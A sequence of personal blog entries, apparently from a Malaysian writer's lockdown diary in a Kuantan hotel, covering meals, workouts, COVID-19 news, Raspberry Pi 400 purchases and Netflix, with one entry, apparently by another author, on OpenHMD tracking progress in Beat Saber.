Monday I had a steak from Bay Leaf Steakhouse for dinner. It was kind of weird eating it from packs, but then I’m reminded you could do this in economy class. Tuesday I wanted to attempt to go vegetarian and by the time I was done with a workout, the only place was a chap fan shop (Leong Heng) where I had a mixture of Chinese and Indian chap fan. The Indian stall is run by an ex-Hyatt staff member who immediately recognised me! Wednesday, Alice came to visit, so we got to Hanks, got some alcohol, and managed a smorgasbord of food from Pickers/Sate Zul/Lila Wadi. Night ended very late, and on Thursday, visited Hai Tian for their famous salted egg squid and prawns in a coconut shell. Friday was back to being normal, so I grabbed a pizza from Mint Pizza (this time I tried their Aussie variant). Saturday, today, I hit up Rasa Sayang for some matcha latte, but grabbed food from Classic Pilot Cafe, which Faeeza owns! It was the famous salted egg chicken, double portion, half rice.
As for workouts, I did sign up for Mantas but found it pretty hard to do, timezone wise. I did spend a lot of time jogging on the beach (this has been almost a daily affair). Monday I also did 2 MD workouts, Tuesday 1 MD workout, Wednesday half a MD workout, Thursday I did a Ping workout at Pwrhouse (so good!), Friday 1 MD workout, and Saturday an Audrey workout at Pwrhouse and 1 MD workout.
Wednesday I also found out that Rasmus passed away. Frankly, there are no words.
Thursday, my Raspberry Pi 400 arrived. I set it up in under ten minutes, connecting it to the TV here. It “just works”. I made a video, which I should probably figure out how to upload to YouTube after I stitch it together. I have to work on using it a lot more.
COVID-19 cases are through the roof in Malaysia. This weekend we’ve seen two days of case breaking records, with today being 5,728 (yesterday was something close). Nutty. Singapore suspended the reciprocal green lane (RGL) agreement with Malaysia for the next 3 months.
I’ve managed to finish Bridgerton. I like the score. Finding something on Netflix is proving to be more difficult, regardless of having a VPN. Honestly, this is why Cable TV wins… linear programming that you’re just fed.
Stock market wise, I’ve been following the GameStop short squeeze, and even funnier is the Top Glove one, that they’re trying to repeat in Malaysia. Bitcoin seems to be doing “reasonably well” and I have to say, I think people are starting to realise decentralised services have a future. How do we get there?
What an interesting week, I look forward to more productive time. I’m still writing in my Hobonichi Techo, so at least that’s where most personal stuff ends up, I guess?
I hit an important OpenHMD milestone tonight – I completed a Beat Saber level using my Oculus Rift CV1!
I’ve been continuing to work on integrating Kalman filtering into OpenHMD, and on improving the computer vision that matches and tracks device LEDs. While I suspect noone will be completing Expert levels just yet, it’s working well enough that I was able to play through a complete level of Beat Saber. For a long time this has been my mental benchmark for tracking performance, and I’m really happy
Check it out:
I should admit at this point that completing this level took me multiple attempts. The tracking still has quite a tendency to lose track of controllers, or to get them confused and swap hands suddenly.
I have a list of more things to work on. See you at the next update!
What an unplanned day. I woke up in time to do an MD workout, despite feeling a little sore. So maybe I was about 10 minutes late and I missed the first set, but his workouts are so long, and I think there were seven sets anyway. Had a good brunch shortly thereafter.
Did a bit of reading, and then I decided to do a beach boardwalk walk… turns out they were policing the place, and you can’t hit the boardwalk. But the beach is fair game? So I went back to the hotel, dropped off my slippers, and went for a beach jog. Pretty nutty.
Came back to read a little more and figured I might as well do another MD workout. Then I headed out for dinner, trying out a new place — Mint Pizza. Opened 20.12.2020, and they’re empty, and their pizza is actually pretty good. Lamb and BBQ chicken, they did half-and-half.
Twitter was discussing Raspberry Pi’s, and all I could see is a lot of misinformation, which is truly shocking. The irony is that open source has been running the Internet for so long, and progressive web apps have come such a long way…
Back in the day when I did OpenOffice.org or Linux training even, we always did say you should learn concepts and not tools. From the time we ran Linux installfests in the late-90s in Sunway Pyramid (back then, yes, Linux was hard, and you had winmodems), but I had forgotten that I even did stuff for school teachers and NGOs back in 2002… I won’t forget PC Gemilang either…
Anyway, I placed an order again for another Raspberry Pi 400. I am certain that most people talk so much crap, without realising that Malaysia isn’t a developed nation and most people can’t afford a Mac let alone a PC. Laptops aren’t cheap. And there are so many other issues…. Saying Windows is still required in 2021 is the nuttiest thing I’ve heard in a long time. Easy to tweet, much harder to think about TCO, and realise where in the journey Malaysia is.
Maybe the best thing was that Malaysian Twitter learned about technology. I doubt many realised the difference between a Pi board vs the 400, but hey, the fact that they talked about tech is still a win (misinformed, but a win).
Today is the first day that in the state of Pahang, we have to encounter what many Malaysians are referring to as the Movement Control Order 2.0 (MCO 2.0). I think everyone finally agrees with the terminology that this is a lockdown now, because I remember back in the day when I was calling it that, I’d definitely offend a handful of journalists.
This is one interesting change for me compared to when I last wrote Life with Rona — Day 56 of being indoors and not even leaving my household, in Kuala Lumpur. I am now not in the state, I am living in a hotel, and I am obviously moving around a little more since we have access to the beach.
KL/Selangor and several other states have already been under the MCO 2.0 since January 13 2021, and while it was supposed to end on January 26, it seems like they’ve extended and harmonised the dates for Peninsular Malaysia to end on February 4 2021. I guess everyone got the “good news” yesterday. The Prime Minister announced some kind of aid last week, but it is still mostly a joke.
Today was the 2nd day I woke up at around 2.30pm because I went to bed at around 8am. First day I had a 23.5 hour uptime, and the today was less brutal, but working from 1-8am with the PST timezone is pretty brutal. Consequently, I barely got too much done, and had one meal, vegetarian, two packs that included rice. I did get to walk by the beach (between Teluk Cempedak and Teluk Cempedak 2), did quite a bit of exercise there and I think even the monkeys are getting hungry… lots of stray cats and monkeys. Starbucks closes at 7pm, and I rocked up at 7.10pm (this was just like yesterday, when I arrived at 9.55pm and was told they wouldn’t grant me a coffee!).
While writing this entry, I did manage to get into a long video call with some friends and I guess it was good catching up with people in various states. It also is what prevented me from publishing this entry!
I did wake up reasonable early today because I had pre-ordered room service to arrive at 9am. There is a fixed menu at the hotel for various cuisines (RM48/pax, thankfully gratis for me) and I told them I prefer not having to waste, so just give me what I want which is off menu items anyway. Roti telur double telur (yes, I know it is a roti jantan) with some banjir dhal and sambal and a bit of fruit on the side with two teh tariks. They delivered as requested. I did forget to ask for a jar of honey but that is OK, there is always tomorrow.
I spent most of the day vacillating, and wouldn’t consider it productive by any measure. Just chit chats and napping. It did rain today after a long time, so the day seemed fairly dreary.
When I finally did awaken from my nap, I went for a run on the beach. I did it barefoot. I have no idea if this is how it is supposed to be done, or if you are to run nearer the water or further up above, but I did move around between the two quite often. The beach is still pretty dead, but it is expected since no one is allowed to go unless you’re a hotel guest.
The hotel has closed 3/4 of their villages (blocks) and moved everyone to the village I’m staying in (for long stay guests…). I’m thankful I have a pretty large suite, it is a little over 980sqft, and the ample space, while smaller than my home, is still welcome.
Post beach run, I did a workout with MD via Instagram. It was strength/HIIT based, and I burnt a tonne, because he gave us one of his signature 1.5h classes. It was longer than the 80 minute class he normally charges RM50 for (I still think this is undervaluing his service, but he really does care and does it for the love of seeing his students grow!).
Post-workout I decided to head downtown to find some dinner. Everything at the Teluk Cemepdak block of shops was closed, so they’re not even bothered with doing takeaway. Sg. Lembing steakhouse seemed to have cars parked, Vanggey was empty (Crocodile Rock was open, can’t say if there was a crowd, because the shared parking lot was empty), there was a modest queue at Sate Zul, and further down, Lena was closed, Pickers was open for takeaway but looked pretty closed, Tjantek was open surprisingly, and then I thought I’d give Nusantara a try again, this time for food, but their chef had just gone home at about 8pm. Oops. So I drove to LAN burger, initially ordering just one chicken double special; however they looked like they could use the business so I added on a beef double special. They now accept Boost payments so have joined the e-wallet era. One less place to use cash, which is also why I really like Kuantan. On the drive back, Classic Pilot Cafe was also open and I guess I’ll be heading there too during this lockdown.
Came back to the room to finish both burgers in probably under 15 minutes. While watching the first episode of Bridgerton on Netflix. I’m not sure what really captivates, but I will continue on (I still haven’t finished the first episode). I need to figure out how to use the 2 TVs that I have in this room — HDMI cable? Apple TV? Not normally using a TV, all this is clearly more complex than I care to admit.
I soaked longer than expected, ended up a prune, but I’m sure it will give me good rest!
One thought to leave with:
“Learn to enjoy every minute of your life. Be happy now. Don’t wait for something outside of yourself to make you happy in the future.” — Earl Nightingale